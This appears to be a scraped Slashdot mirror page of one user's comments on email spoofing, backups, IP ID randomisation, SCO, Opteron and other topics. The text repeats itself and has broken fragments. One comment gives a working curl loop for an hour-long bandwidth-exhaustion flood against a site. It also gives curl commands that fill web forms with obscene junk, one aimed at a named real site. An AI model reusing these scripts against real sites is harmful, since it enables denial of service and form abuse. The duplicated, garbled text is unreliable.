if you read the article, it explains how techniques like using PGP to sign messages can make the From field unspoofable, but they are not relevant when privacy or anonymity is crucial (whistleblowing, etc.). Hence, it cannot be demanded that everyone follows this practice. It suggests recipients should check your email more carefully to see if its legit (the article also explains this; checking your headers for a "postmark" that looks abnormal).
The last quote was somewhat encouraging, that "the Internet is a rough and tumble place" (paraphrasing) but we'll cope because it is often the best way to reach people.
If an unspoofable From: is what you want, demand your mail server administrator only accept signed messages, or filter them yourself in your client. Another option is to convince her (and/or the administrators of any other MXs you care about) to relay with SMTP AUTH only. Most mail clients support that feature nowadays. If enough people start using that new RFC, we shouldn't have to worry about hijacked ISPs mail servers being used to send spam, and their netblocks being RBL'd.
1) You're helping them pay off their development costs because you absolutely need the 64-bit stuff RIGHT NOW. I for one am involved in getting a few such systems, and its like pulling teeth from the vendors getting them out the door (the demand is pretty high, so I guess AMD sized up their market about right).
2) The difference between the Athlon MP and the XP is also that the MP has been tested to run MP without screwing up (cache timings, etc.). AFAIK you get a better warranty too.
The real problem is that tapes lag behind hard disks in terms of storage capacity vs. cost. There isn't even much of a weight/size advantage with large tapes (DLT IV, AIT-3). Since 80GB drives can be had for less than $100, that would take 2 DLT tapes at $45 each. You save a few bucks on the tape, but you have more tapes that take up more room. Plus, hard disks have the extra benefit of being tons faster and seekable.
Now your argument about hard disk capacities increasing doesn't hold water. You will need more tapes to back up bigger data storage arrays anyway, so by that logic, you could buy still more cheap hard drives. The sweet spot in cost between tapes and the hard disks won't change. So you just size up your "real" storage, then buy extra, cheap hard drives in sufficient quantity to mirror it at intervals. I think the real issue why no one does this is because it seems counterintuitive, its not a common practice. Every time I want to configure some massive, but cheap volume to store project data, I always get stopped by my boss with "well how are we going to back this up?". The tape technology isn't there (for the right price). But if we spent the money we spend on tape drives and tapes to fund a hard-disk based solution, I wouldn't worry about how we would back those massive volumes up. I could probably buy a whole palette of hard disks for the entire project, and allocate X for the actual storage, and have Y slated for incrementals, and Z for archives and hot spares. Plus we could move hard disks in and out of the data volume and into the backup pool (or vice-versa) as our needs dictate.
What's nice about the hard disks is that they will be in storage, in parked mode most of the time so you shouldn't have to worry about them failing even if the warranty is shoddy. And it's got built-in electronics, so you don't have to worry about a tape drive/robot going on the fritz.
Okay, I got confused between TCP sequence numbers and IP ids. But with TCP sequence numbers, you send both the current and the NEXT one to the other side. So they can be anything. However, that wasn't what the study was looking at... They were using IP ids. Apparently, most IP stacks just increment a counter for each packet they send out. However, IP ids need not increment; they are assigned to a packet, and if it fragments it can reassemble it by finding the "closest" packets with the same id and destination. A router can do whatever it wants in this field so it can make sure the datagram gets through uncorrupted. If the OS happens using an incrementing scheme for each new IP packet, this can still be fixed with a properly configured NAT/firewall to randomly assign them so that this method can't be used against it. This practice would nullify the ability to detect multiple streams incrementing from different starting points.
In fact, *BSD already implements a fix for this, it's the RANDOM_IP_ID option in the kernel. Also, linux has had this since 2.4.0 by default (secure_ip_id); there is one catch, it depletes your entropy pool so if you don't have a good entropy source eventually it'll send all zeros!:-) Let's see the ISP try to figure that one out.
I live near Dulles. It's either Cox residential, or ISDN. Cox QOS is so bad I call them up just to harrass them now, becuase I know nothing will ever get fixed. Meanwhile, there's no DSL to be found. Furthermore, Cox won't offer "Business class" service here, which is stupid because the area is so flush with cash and techies and I would kill to get better QOS on cable.
In short: richest county in middle atlantic has no decent broadband. Something is seriously wrong in the county seat of AOL.
As I understand it, the problem comes where you have several computers, all generating their own sequence numbers. Especially if you have a mix of OSes, it will be obvious that there are multiple connections with diferent sequences
The method requires the OS to use a simple set and increment method (ala Windows 98 and old MacOS) with which it can identify multiple linear progressions (and thus multiple machines). However, if each machine uses a random number for every packet (like the ones I mentioned), you can't seperate one from the other since it all looks like noise.
Of course, it doesn't prevent them from looking for stuff as you mentioned; Mac Updater + WinXP updater plus RedCarpet = weird fishiness. However, this assumes they have a very large clue. I think most would assume a cluster of Windows boxes. And even this could be detected if Windows update trasnmits a GUID as part of the connection process; this could be detected and used as evidence for NAT if the ISP sees a lot of different ones.
Well, if you use Win2k, XP, Mac OS X, Linux or Solaris, you're covered because the sequence numbers are already random, and thus you can't use the counting technique. And if you have old computers, you won't need to modify anything except for your firewall rules. If you have *BSD, you have the sequence number rewriter, which is also available on linux as the "ippersonality" extension to the iptables firewall. Both of these guys also support ttl mangling too (built-in).
You have the power to make your network look like whatever you want. It's nice to have an ISP that's cool, but if you're unlucky, they'll never be the wiser. In a way, if you're going through such effort, you're probably helping them out somehow by wrangling your own network into some resemblance of order. ^_^
Not one mention of how IBM has leaked any SCO IP into linux. Not one mention of how any IBM contributions might are SCO derived. Not one mention of how any particular part of linux is contributed directly (instead of jointly developed with) IBM.
They successfully made PDF copies of the individual IP and Trademark transfers between parties (AT&T, IBM, SCO, etc.). Hurrah. Real informative.
I don't buy American Greetings cards... they suck anyway.
Have you ever been to a Carlton Cards store? Christ those places are sentiment-shitholes.
Every card is bland, or gooey, bl-ooey, or completely unfunny. Same thing with the ornaments during the holdiays. Do yourself a favor and stick to Hallmark cards at CVS. They actually have permission to use Peanuts characters.
This is entirely correct. The distribution of SuSe linux and the applications used were designed to use the x86-64 bit mode, and get the full benefit of the new instruction set and large registers. If he was able to try some windows benchmarks designed for x86-64, he might have gotten more favorable numbers. Alas, betas of these microsoft products are nearly impossible to obtain, although they have been promised.
Where the opteron will shine is when people start doing things like testing OpenSSL using the new instruction set in the encryption core. I notice in the latest tarballs, there is x86-64 optimized bignum code, which is used elsewhere to implement various parts of the crypto library. I am eager to see the numbers on that.
Solaris is very finnicky about ever writing out the pages in working RAM into swap. In particular, it fills free RAM with cached inodes, directories, and small files until the free memory ceiling hits a watermark, then it merely starts running the page reclaimer. The page reclaimer is the only way certain files and directories get written back to disk unless some option is turned on in the UFS layer, or the file is opened O_SYNC, AFAIK.
I imagine linux does this too, I remember reading how the vfs layer and page buffer layer are tied at the hip, and the same sort of thing happens.
not 3 months ago they just up and canceled a project a good friend of mine was working on without warning. This was right after he gave a presentation on his latest successful efforts that seemed to impress the sponsors.
Needless to say, he was pissed as all get out.
Apparently this happens a lot... especially in research for information technology.
I mean seriously, its not like this guy is starting a book tour or series of $200 seminars or anything. He's presenting his proof to the community so that it can be studied and discussed; that's what this is about.
So what the hell are you talking about... was it supposed to be tounge-in-cheek humor?
I don't think you've been properly introduced to the better of the TI calcs... I've got 'em both:
A TI-83 which is overclocked... (!) Still works like a charm after having its guts ripped out repeatedly. Now, I didn't drop it in a lake, but it's been in the shower... so... hehe
And then, the workhorse, my beloved TI-89. Let me just say to all the HP holier-than-thou people out there: AOS ownz. So it doesn't have RPN (but I remember seeing a few packages on ticalc.org)... but it does everything else. I mean jesus, it's a frickin' 68010.
I get real work done with it too... my main folder has about a hundred functions and programs sittin around; i forget what half of them do.;P
It has nothing to do with alternative types of fusion to create energy. Rather, they found experimental evidence that backs up some of the theories in particle physics (the relationship between protons and their slightly heavier cousins the neutrons).
It may seem like a so-what type moment, but apparently they were getting five of these events a day, with dozens of recorded events. So scientists will have a lot of new experimental evidence to chew on, and maybe there will be some refinement in various theories or models used in quantum chromodynamics (study of quarks, basically).
Then, I could be wrong... Anyone who follows this stuff know of any other more significant studies that regularly contribute evidence to those working in q.c.d?
Cleary, it's the mods on crack, today and everyday. That's _real_ synesthesia. (oooh pretty words make me hear stereo, MOD UP INSIGHTFUL!!!!! FOR GREAT JUSTICE)
If you go to the FAQ on NXT's website, you'll discover they use superposition principles to produce virtual channels in the sweet spot. They can do two; supposedly three (L, R + center) is possible.
Watermark, joint-stereo, give me a fucking break. Add nonsense buzzwords to a post and get modded up! A 2-step plan for slashdot success. (Unless you meant to be funny... in which case a big YOU ARE TEH 1Di07s!!! to the mods active today)
NXT argues its technology has major advantages over conventional speakers. It says its SoundVU technology distributes frequencies evenly across a room, producing what audio buffs call a universal "sweet spot".
I read that as it's a speaker that fills the room with a single channel of sound. If it was in stereo, then it wouldn't be room filling if you could discern the channels. You could probably deal with it if the screen created two virtual speakers by superposition using exciters on opposite sides of the monitor. But then the sweet spot would be very small, aimed at the person sitting a few feet away. Definitely not room filling.
Plus, they go on to say how they intend to use it in mobile phones and PDAs. All single channel devices when used without headphones.
First, try to convince the server to give you a listing of/images/ and/or the web root with like the/?A=D trick./icons/ is also useful. Save this somewhere. Then, turn it into a big list of URLs for pages and images, say "url_file_you_made". Finally, write a shell script to use that for nefarious purposes, like this:
end = $(($(date +%s) + 3600)) # 1 hour from now while [ $(date +%s) -lt $end ]; do
for each in $(cat url_file_you_made); do
curl -e "SPAM_EQUALS_I_POISON_YOUR_REFERAL_LOGS" \
-A "libcurl in da hizzouse" \
-m 1 -o/dev/null ${each} &
usleep 500000
done done
That one really can suck down some bandwidth, especially if you tweak the usleep. In this case, each download is forked off and lasts for at most 1 second, so with usleep at.5 seconds you get on average two downloads from the list going at once. But if you decrease it to 250000, then you can have 4, etc. So this will hit all the docs on the site for an hour and waste their bandwidth (the logic being that those cheap webhosting providers hit the spammer with a huge penalty if they go over a transfer limit, but your downstream bandwidth from your ISP is cheap.)
Also if the form is POST, you can use good ol' curl again like this to poison it:
curl http://suckymlmsite.com/formmail.php -F "name=Dickhead" -F "address=Sucking my cock"
note it isn't URL encoded. That's multipart. You can do URL encoded POST with
Slashdot Mirror
if you read the article, it explains how techniques like using PGP to sign messages can make the From field unspoofable, but they are not relevant when privacy or anonymity is crucial (whistleblowing, etc.). Hence, it cannot be demanded that everyone follows this practice. It suggests recipients should check your email more carefully to see if its legit (the article also explains this; checking your headers for a "postmark" that looks abnormal).
The last quote was somewhat encouraging, that "the Internet is a rough and tumble place" (paraphrasing) but we'll cope because it is often the best way to reach people.
If an unspoofable From: is what you want, demand your mail server administrator only accept signed messages, or filter them yourself in your client.
Another option is to convince her (and/or the administrators of any other MXs you care about) to relay with SMTP AUTH only. Most mail clients support that feature nowadays. If enough people start using that new RFC, we shouldn't have to worry about hijacked ISPs mail servers being used to send spam, and their netblocks being RBL'd.
0 line printers - $25,000
1 phone switch - $133,000
The same phone switch on newegg - $4
Succeeding to sweep a damning audit of your shady accounting under the rug: Priceless
There are some things money can't buy. You use back-office deals with the FCC for that.
1) You're helping them pay off their development costs because you absolutely need the 64-bit stuff RIGHT NOW. I for one am involved in getting a few such systems, and its like pulling teeth from the vendors getting them out the door (the demand is pretty high, so I guess AMD sized up their market about right).
2) The difference between the Athlon MP and the XP is also that the MP has been tested to run MP without screwing up (cache timings, etc.). AFAIK you get a better warranty too.
The real problem is that tapes lag behind hard disks in terms of storage capacity vs. cost. There isn't even much of a weight/size advantage with large tapes (DLT IV, AIT-3). Since 80GB drives can be had for less than $100, that would take 2 DLT tapes at $45 each. You save a few bucks on the tape, but you have more tapes that take up more room. Plus, hard disks have the extra benefit of being tons faster and seekable.
Now your argument about hard disk capacities increasing doesn't hold water. You will need more tapes to back up bigger data storage arrays anyway, so by that logic, you could buy still more cheap hard drives. The sweet spot in cost between tapes and the hard disks won't change.
So you just size up your "real" storage, then buy extra, cheap hard drives in sufficient quantity to mirror it at intervals.
I think the real issue why no one does this is because it seems counterintuitive, its not a common practice. Every time I want to configure some massive, but cheap volume to store project data, I always get stopped by my boss with "well how are we going to back this up?". The tape technology isn't there (for the right price). But if we spent the money we spend on tape drives and tapes to fund a hard-disk based solution, I wouldn't worry about how we would back those massive volumes up. I could probably buy a whole palette of hard disks for the entire project, and allocate X for the actual storage, and have Y slated for incrementals, and Z for archives and hot spares. Plus we could move hard disks in and out of the data volume and into the backup pool (or vice-versa) as our needs dictate.
What's nice about the hard disks is that they will be in storage, in parked mode most of the time so you shouldn't have to worry about them failing even if the warranty is shoddy. And it's got built-in electronics, so you don't have to worry about a tape drive/robot going on the fritz.
since by default they're randomized in Linux 2.4.x. Hooooooray!
Okay, I got confused between TCP sequence numbers and IP ids. But with TCP sequence numbers, you send both the current and the NEXT one to the other side. So they can be anything. However, that wasn't what the study was looking at...
:-) Let's see the ISP try to figure that one out.
They were using IP ids. Apparently, most IP stacks just increment a counter for each packet they send out. However, IP ids need not increment; they are assigned to a packet, and if it fragments it can reassemble it by finding the "closest" packets with the same id and destination. A router can do whatever it wants in this field so it can make sure the datagram gets through uncorrupted. If the OS happens using an incrementing scheme for each new IP packet, this can still be fixed with a properly configured NAT/firewall to randomly assign them so that this method can't be used against it. This practice would nullify the ability to detect multiple streams incrementing from different starting points.
In fact, *BSD already implements a fix for this, it's the RANDOM_IP_ID option in the kernel. Also, linux has had this since 2.4.0 by default (secure_ip_id); there is one catch, it depletes your entropy pool so if you don't have a good entropy source eventually it'll send all zeros!
I live near Dulles. It's either Cox residential, or ISDN. Cox QOS is so bad I call them up just to harrass them now, becuase I know nothing will ever get fixed. Meanwhile, there's no DSL to be found. Furthermore, Cox won't offer "Business class" service here, which is stupid because the area is so flush with cash and techies and I would kill to get better QOS on cable.
In short: richest county in middle atlantic has no decent broadband. Something is seriously wrong in the county seat of AOL.
As I understand it, the problem comes where you have several computers, all generating their own sequence numbers. Especially if you have a mix of OSes, it will be obvious that there are multiple connections with diferent sequences
The method requires the OS to use a simple set and increment method (ala Windows 98 and old MacOS) with which it can identify multiple linear progressions (and thus multiple machines). However, if each machine uses a random number for every packet (like the ones I mentioned), you can't seperate one from the other since it all looks like noise.
Of course, it doesn't prevent them from looking for stuff as you mentioned; Mac Updater + WinXP updater plus RedCarpet = weird fishiness. However, this assumes they have a very large clue. I think most would assume a cluster of Windows boxes. And even this could be detected if Windows update trasnmits a GUID as part of the connection process; this could be detected and used as evidence for NAT if the ISP sees a lot of different ones.
Well, if you use Win2k, XP, Mac OS X, Linux or Solaris, you're covered because the sequence numbers are already random, and thus you can't use the counting technique.
And if you have old computers, you won't need to modify anything except for your firewall rules. If you have *BSD, you have the sequence number rewriter, which is also available on linux as the "ippersonality" extension to the iptables firewall. Both of these guys also support ttl mangling too (built-in).
You have the power to make your network look like whatever you want. It's nice to have an ISP that's cool, but if you're unlucky, they'll never be the wiser. In a way, if you're going through such effort, you're probably helping them out somehow by wrangling your own network into some resemblance of order. ^_^
Also, linux (like *bsd) randomizes ipid's by default now. Have fun with NAT, without fear.
Not one mention of how IBM has leaked any SCO IP into linux. Not one mention of how any IBM contributions might are SCO derived.
Not one mention of how any particular part of linux is contributed directly (instead of jointly developed with) IBM.
They successfully made PDF copies of the individual IP and Trademark transfers between parties (AT&T, IBM, SCO, etc.).
Hurrah. Real informative.
you mean xfs? whoop-dee-doo. :-)
I don't buy American Greetings cards... they suck anyway.
Have you ever been to a Carlton Cards store? Christ those places are sentiment-shitholes.
Every card is bland, or gooey, bl-ooey, or completely unfunny. Same thing with the ornaments during the holdiays.
Do yourself a favor and stick to Hallmark cards at CVS. They actually have permission to use Peanuts characters.
Boycott, hahahaha.
This is entirely correct. The distribution of SuSe linux and the applications used were designed to use the x86-64 bit mode, and get the full benefit of the new instruction set and large registers. If he was able to try some windows benchmarks designed for x86-64, he might have gotten more favorable numbers. Alas, betas of these microsoft products are nearly impossible to obtain, although they have been promised.
Where the opteron will shine is when people start doing things like testing OpenSSL using the new instruction set in the encryption core. I notice in the latest tarballs, there is x86-64 optimized bignum code, which is used elsewhere to implement various parts of the crypto library. I am eager to see the numbers on that.
Solaris is very finnicky about ever writing out the pages in working RAM into swap. In particular, it fills free RAM with cached inodes, directories, and small files until the free memory ceiling hits a watermark, then it merely starts running the page reclaimer. The page reclaimer is the only way certain files and directories get written back to disk unless some option is turned on in the UFS layer, or the file is opened O_SYNC, AFAIK.
I imagine linux does this too, I remember reading how the vfs layer and page buffer layer are tied at the hip, and the same sort of thing happens.
not 3 months ago they just up and canceled a project a good friend of mine was working on without warning. This was right after he gave a presentation on his latest successful efforts that seemed to impress the sponsors.
Needless to say, he was pissed as all get out.
Apparently this happens a lot... especially in research for information technology.
I mean seriously, its not like this guy is starting a book tour or series of $200 seminars or anything. He's presenting his proof to the community so that it can be studied and discussed; that's what this is about.
So what the hell are you talking about... was it supposed to be tounge-in-cheek humor?
I don't think you've been properly introduced to the better of the TI calcs... I've got 'em both:
;P
A TI-83 which is overclocked... (!) Still works like a charm after having its guts ripped out repeatedly. Now, I didn't drop it in a lake, but it's been in the shower... so... hehe
And then, the workhorse, my beloved TI-89. Let me just say to all the HP holier-than-thou people out there: AOS ownz.
So it doesn't have RPN (but I remember seeing a few packages on ticalc.org)... but it does everything else. I mean jesus, it's a frickin' 68010.
I get real work done with it too... my main folder has about a hundred functions and programs sittin around; i forget what half of them do.
It has nothing to do with alternative types of fusion to create energy. Rather, they found experimental evidence that backs up some of the theories in particle physics (the relationship between protons and their slightly heavier cousins the neutrons).
It may seem like a so-what type moment, but apparently they were getting five of these events a day, with dozens of recorded events. So scientists will have a lot of new experimental evidence to chew on, and maybe there will be some refinement in various theories or models used in quantum chromodynamics (study of quarks, basically).
Then, I could be wrong... Anyone who follows this stuff know of any other more significant studies that regularly contribute evidence to those working in q.c.d?
curl http://national-directories.com/_vti_bin/shtml.exe /S2-usmrg.htm -F "VTI-GROUP=0" -F "ProductOrService=INFOSOURCE United States Media Relations Guide" -F "SendServiceLiterature=yes" -F "Name=DICKWEED JOHNSON" -F "Title=ASSMASTER (M.S.)" -F "Company=Big Schlongs LLC" -F "Address=666 Hades Valley Dr.^J" -F "Email=president@bschlongs.net" -F "Phone=414 568 7114"
have fun!
Cleary, it's the mods on crack, today and everyday. That's _real_ synesthesia. (oooh pretty words make me hear stereo, MOD UP INSIGHTFUL!!!!! FOR GREAT JUSTICE)
How did this get modded Interesting?
If you go to the FAQ on NXT's website, you'll discover they use superposition principles to produce virtual channels in the sweet spot. They can do two; supposedly three (L, R + center) is possible.
Watermark, joint-stereo, give me a fucking break. Add nonsense buzzwords to a post and get modded up! A 2-step plan for slashdot success. (Unless you meant to be funny... in which case a big YOU ARE TEH 1Di07s!!! to the mods active today)
NXT argues its technology has major advantages over conventional speakers. It says its SoundVU technology distributes frequencies evenly across a room, producing what audio buffs call a universal "sweet spot".
I read that as it's a speaker that fills the room with a single channel of sound. If it was in stereo, then it wouldn't be room filling if you could discern the channels. You could probably deal with it if the screen created two virtual speakers by superposition using exciters on opposite sides of the monitor. But then the sweet spot would be very small, aimed at the person sitting a few feet away. Definitely not room filling.
Plus, they go on to say how they intend to use it in mobile phones and PDAs. All single channel devices when used without headphones.
First, try to convince the server to give you a listing of
Then, turn it into a big list of URLs for pages and images, say "url_file_you_made". Finally, write a shell script to use that for nefarious purposes, like this:That one really can suck down some bandwidth, especially if you tweak the usleep. In this case, each download is forked off and lasts for at most 1 second, so with usleep at
Also if the form is POST, you can use good ol' curl again like this to poison it:note it isn't URL encoded. That's multipart. You can do URL encoded POST with
Like zip disks, floppies, and mini-disc. Hence, you protect it from grubby fingers.